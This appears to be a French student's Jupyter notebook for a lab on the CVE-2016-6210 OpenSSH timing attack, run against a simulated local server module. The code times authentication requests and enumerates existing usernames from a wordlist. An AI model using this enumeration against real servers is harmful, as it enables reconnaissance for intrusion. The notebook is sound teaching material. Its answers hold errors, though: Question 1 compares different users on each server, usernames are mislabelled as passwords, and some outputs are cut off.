# Attaque temporelle sur OpenSSH

En 2016, une faille sur le logiciel OpenSSH, un serveur SSH très courant sur les environnements Unix, a été révélée publiquement et identifiée comme CVE-2016-6210. La faille en question est exploitable via une attaque temporelle sur la phase d'authentification et donne accès par ce canal auxiliaire à la liste des utilisateurs du serveur. Pour les besoins du TP, la faille simplifiée a été réimplémentée dans le module `ssh.py`, qui contient une fonction `authenticate` et qui s'utilise comme dans l'exemple ci-dessous :

In [1]:
from ssh import authenticate

# Two servers are available: 'vulnerable' (which is vulnerable to CVE-2016-6210) and 'secured' (which has been patched).

# Try to connect and to authenticate on a vulnerable remote server with given credentials
print(authenticate(server='vulnerable', user='test', password='test'))

# Try to connect and to authenticate on a secured remote server with given credentials
print(authenticate(server='secured', user='test', password='test'))

FAIL
FAIL


### Question 1
Écrire un script qui donne le temps de réponse (en millisecondes) de la connexion SSH pour les identifiants suivants :
- `user`: "root", `password`: "wrong"
- `user`: "unknown_user", `password`: "wrong"

In [2]:
import time

print("Temps Vulnérable : ")
debut = time.time()
authenticate(server='vulnerable', user='root', password='wrong')
vul = (time.time() - debut) *1000
print(vul, " ms\n")

print("Temps Sécurisé : ")
debut = time.time()
authenticate(server='secured', user='unknown_user', password='wrong')
sec = (time.time() - debut)*1000
print(sec, " ms\n")

print("\nLe temps de connection sur la vulnérable est ",vul - sec, "ms plus long")

Temps Vulnérable : 
0.08296966552734375  ms

Temps Sécurisé : 
0.0553131103515625  ms


Le temps de connection sur la vulnérable est  0.02765655517578125 ms plus long


### Question 2
Écrire une fonction `chrono` qui, à partir d'un `user` et d'un `password` donné, mesure le temps de réponse de l'authentification sur `server` en millisecondes.

In [3]:
def chrono(server, user, password):
    debut = time.time()
    authenticate(server, user, password)
    return(1000 * (time.time()-debut))

### Question 3
Mettre en évidence l'influence (ou non) de la taille du `password` sur les identifiants `root` et `unknown_user` pour les deux serveurs (vulnérable et sécurisé) :

In [4]:
def test(server,user):
    password = ""
    for i in range(0,1000001,100000):
        password = password + "a"*i
        print(server," pour un password de ",i," caractères",chrono(server,user,password)) 
print("Test sur le serveur vulnérable avec l'utilisateur test")
test("vulnerable","test")

print("\nTest sur le serveur vulnérable avec l'utilisateur unknow_user")
test("vulnerable","unknown_user")

print("\nTest sur le serveur sécurisé avec l'utilisateur test")
test("secured","test")

print("\nTest sur le serveur sécurisé avec l'utilisateur unknow_user")
test("secured","unknown_user")

Test sur le serveur vulnérable avec l'utilisateur test
vulnerable  pour un password de  0  caractères 0.020265579223632812
vulnerable  pour un password de  100000  caractères 2.4476051330566406
vulnerable  pour un password de  200000  caractères 0.8132457733154297
vulnerable  pour un password de  300000  caractères 1.6415119171142578
vulnerable  pour un password de  400000  caractères 5.505800247192383
vulnerable  pour un password de  500000  caractères 8.458137512207031
vulnerable  pour un password de  600000  caractères 10.594367980957031
vulnerable  pour un password de  700000  caractères 17.030000686645508
vulnerable  pour un password de  800000  caractères 22.836923599243164
vulnerable  pour un password de  900000  caractères 27.135848999023438
vulnerable  pour un password de  1000000  caractères 27.401447296142578

Test sur le serveur vulnérable avec l'utilisateur unknow_user
vulnerable  pour un password de  0  caractères 0.017881393432617188
vulnerable  pour un password de  1000

### Question 4
Écrire une fonction `check_user` qui teste si un utilisateur `user` existe ou non sur le serveur vulnérable :

In [5]:
def check_user(user):
    temps = chrono("vulnerable",user,"a"*10000000)
    if temps > 5:
        return("présent")
    return("non présent")

### Question 5
Tenter d'extaire une liste d'utilisateurs du serveur vulnérable à partir de la liste des utilisateurs répandus sur des serveurs Unix en pièce jointe `users.txt` :

In [8]:
with open("users.txt","r") as fichier:
    lignes = fichier.readlines()

present=[]
for ligne in lignes:
    ligne = ligne.strip()
    test = check_user(ligne)
    print("Le mot de passe : ",ligne," est ",test)
    if test == "présent":
        present.append(ligne)
        
print("\nMots de passe présents",present)

Le mot de passe :  root  est  présent
Le mot de passe :  daemon  est  présent
Le mot de passe :  bin  est  non présent
Le mot de passe :  sys  est  non présent
Le mot de passe :  sync  est  non présent
Le mot de passe :  games  est  non présent
Le mot de passe :  man  est  non présent
Le mot de passe :  lp  est  non présent
Le mot de passe :  mail  est  non présent
Le mot de passe :  news  est  non présent
Le mot de passe :  uucp  est  non présent
Le mot de passe :  proxy  est  non présent
Le mot de passe :  www-data  est  présent
Le mot de passe :  backup  est  non présent
Le mot de passe :  list  est  non présent
Le mot de passe :  irc  est  non présent
Le mot de passe :  gnats  est  non présent
Le mot de passe :  nobody  est  non présent
Le mot de passe :  systemd-network  est  non présent
Le mot de passe :  systemd-resolve  est  non présent
Le mot de passe :  syslog  est  non présent
Le mot de passe :  messagebus  est  non présent
Le mot de passe :  _apt  est  non présent
Le mot de